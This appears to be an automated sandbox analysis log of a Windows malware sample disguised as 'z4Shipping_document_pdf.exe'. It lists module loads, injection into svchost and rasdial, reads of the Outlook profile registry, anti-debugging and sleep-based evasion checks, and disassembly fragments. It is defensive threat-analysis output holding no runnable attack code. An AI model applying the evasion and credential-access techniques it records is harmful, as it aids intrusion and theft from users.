            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasapi32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: rasman.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\rasdial.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\rasdial.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: z4Shipping_document_pdf.exe Static file information: File size 1400925 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fWXPcgRbOhi.exe, 00000004.00000002.4550106724.000000000074E000.00000002.00000001.01000000.00000005.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599591367.000000000074E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: z4Shipping_document_pdf.exe, 00000000.00000003.2133449788.0000000004420000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2132500581.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2133989700.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430527068.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2428480144.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2533327247.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2535771557.0000000004599000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.0000000004740000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2533187407.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490844881.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4550908137.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000003.2460894338.00000000013F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: z4Shipping_document_pdf.exe, 00000000.00000003.2133449788.0000000004420000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2132500581.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2133989700.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2533390722.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430527068.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2428480144.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000005.00000003.2533327247.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2535771557.0000000004599000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.0000000004740000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000002.2533187407.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490844881.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4550908137.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000003.2460894338.00000000013F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000005.00000002.4550647811.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551985733.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599974603.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2818567202.0000000036E4C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000005.00000002.4550647811.0000000002B0A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551985733.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599974603.0000000002A5C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2818567202.0000000036E4C000.00000004.80000000.00040000.00000000.sdmp
            Source: z4Shipping_document_pdf.exe Static PE information: real checksum: 0xa2135 should be: 0x156df5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414202 pushfd ; retf 2_2_00414203
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EBB4 push es; iretd 2_2_0041EBB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AC40 push ebx; retf 2_2_0040AC41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D5E3 pushfd ; retf 2_2_0040D5EB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00404DEF push ebx; ret 2_2_00404E0C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035A0 push eax; ret 2_2_004035A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004086F9 push 9FEAF530h; iretd 2_2_00408705
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033309AD push ecx; mov dword ptr [esp], ecx2_2_033309B6
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_0398D054 push ADC68628h; iretd 4_2_0398D059
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_0398E075 push 9FEAF530h; iretd 4_2_0398E081
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_03992F5F pushfd ; retf 4_2_03992F67
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_0398A76B push ebx; ret 4_2_0398A788
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_039905BC push ebx; retf 4_2_039905BD
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_039A4530 push es; iretd 4_2_039A452C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047709AD push ecx; mov dword ptr [esp], ecx5_2_047709B6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02805156 push 9FEAF530h; iretd 5_2_02805162
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0280769D push ebx; retf 5_2_0280769E
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0281B611 push es; iretd 5_2_0281B60D
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0280184C push ebx; ret 5_2_02801869
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0281E9F0 pushfd ; retn 4003h5_2_0281EA9C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02820960 push es; retf 5_2_02820961
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045EF4EC push es; retf 5_2_045EF4F4
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045E5589 push ds; iretd 5_2_045E55A3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045E67E3 pushad ; ret 5_2_045E67E4
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045EF2B7 pushfd ; ret 5_2_045EF2C5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045E73F4 push ecx; iretd 5_2_045E73F5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045E3E3F pushfd ; retf 5_2_045E3E40
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED2D25 pushad ; retf 7_2_04ED2D8B
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED36BB push ebx; retf 7_2_04ED36BC
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ECD86A push ebx; ret 7_2_04ECD887
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED0242 push ss; retf 7_2_04ED0252
            Source: C:\Windows\SysWOW64\rasdial.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeAPI/Special instruction interceptor: Address: 412F27C
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD1C0 rdtsc 2_2_033AD1C0
            Source: C:\Windows\SysWOW64\rasdial.exe Window / User API: threadDelayed 9839
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.9 %
            Source: C:\Windows\SysWOW64\rasdial.exe API coverage: 3.1 %
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 2748 Thread sleep count: 133 > 30
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 2748 Thread sleep time: -266000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 2748 Thread sleep count: 9839 > 30
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 2748 Thread sleep time: -19678000s >= -30000s
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe TID: 4280 Thread sleep time: -70000s >= -30000s
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe TID: 4280 Thread sleep count: 36 > 30
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe TID: 4280 Thread sleep time: -54000s >= -30000s
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe TID: 4280 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exe TID: 4280 Thread sleep time: -38000s >= -30000s
            Source: C:\Windows\SysWOW64\rasdial.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0281C1E0 FindFirstFileW,FindNextFileW,FindClose,5_2_0281C1E0
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\rasdial.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_033AD1C0 rdtsc
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417683 LdrLoadDll
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E11A4 mov eax, dword ptr fs:[00000030h]2_2_033E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E11A4 mov eax, dword ptr fs:[00000030h]2_2_033E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]2_2_034061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03387190 mov eax, dword ptr fs:[00000030h]2_2_03387190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]2_2_03370185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D71F9 mov esi, dword ptr fs:[00000030h]2_2_033D71F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]2_2_033601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033551EF mov eax, dword ptr fs:[00000030h]2_2_033551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033351ED mov eax, dword ptr fs:[00000030h]2_2_033351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336D1D0 mov eax, dword ptr fs:[00000030h]2_2_0336D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336D1D0 mov ecx, dword ptr fs:[00000030h]2_2_0336D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F61C3 mov eax, dword ptr fs:[00000030h]2_2_033F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F903E mov eax, dword ptr fs:[00000030h]2_2_033F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F903E mov eax, dword ptr fs:[00000030h]2_2_033F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F903E mov eax, dword ptr fs:[00000030h]2_2_033F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F903E mov eax, dword ptr fs:[00000030h]2_2_033F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A020 mov eax, dword ptr fs:[00000030h]2_2_0332A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C020 mov eax, dword ptr fs:[00000030h]2_2_0332C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03405060 mov eax, dword ptr fs:[00000030h]2_2_03405060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E016 mov eax, dword ptr fs:[00000030h]2_2_0334E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B4000 mov ecx, dword ptr fs:[00000030h]2_2_033B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov ecx, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03341070 mov eax, dword ptr fs:[00000030h]2_2_03341070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335C073 mov eax, dword ptr fs:[00000030h]2_2_0335C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AD070 mov ecx, dword ptr fs:[00000030h]2_2_033AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B106E mov eax, dword ptr fs:[00000030h]2_2_033B106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03332050 mov eax, dword ptr fs:[00000030h]2_2_03332050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D705E mov ebx, dword ptr fs:[00000030h]2_2_033D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D705E mov eax, dword ptr fs:[00000030h]2_2_033D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335B052 mov eax, dword ptr fs:[00000030h]2_2_0335B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B6050 mov eax, dword ptr fs:[00000030h]2_2_033B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov eax, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F60B8 mov ecx, dword ptr fs:[00000030h]2_2_033F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C80A8 mov eax, dword ptr fs:[00000030h]2_2_033C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034050D9 mov eax, dword ptr fs:[00000030h]2_2_034050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03335096 mov eax, dword ptr fs:[00000030h]2_2_03335096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335D090 mov eax, dword ptr fs:[00000030h]2_2_0335D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335D090 mov eax, dword ptr fs:[00000030h]2_2_0335D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336909C mov eax, dword ptr fs:[00000030h]2_2_0336909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333208A mov eax, dword ptr fs:[00000030h]2_2_0333208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332D08D mov eax, dword ptr fs:[00000030h]2_2_0332D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C0F0 mov eax, dword ptr fs:[00000030h]2_2_0332C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033720F0 mov ecx, dword ptr fs:[00000030h]2_2_033720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033550E4 mov eax, dword ptr fs:[00000030h]2_2_033550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033550E4 mov ecx, dword ptr fs:[00000030h]2_2_033550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0332A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033380E9 mov eax, dword ptr fs:[00000030h]2_2_033380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B60E0 mov eax, dword ptr fs:[00000030h]2_2_033B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B20DE mov eax, dword ptr fs:[00000030h]2_2_033B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033590DB mov eax, dword ptr fs:[00000030h]2_2_033590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov ecx, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov ecx, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov eax, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov ecx, dword ptr fs:[00000030h]2_2_033470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033470C0 mov ecx, dword ptr fs:[00000030h]2_2_033470C0
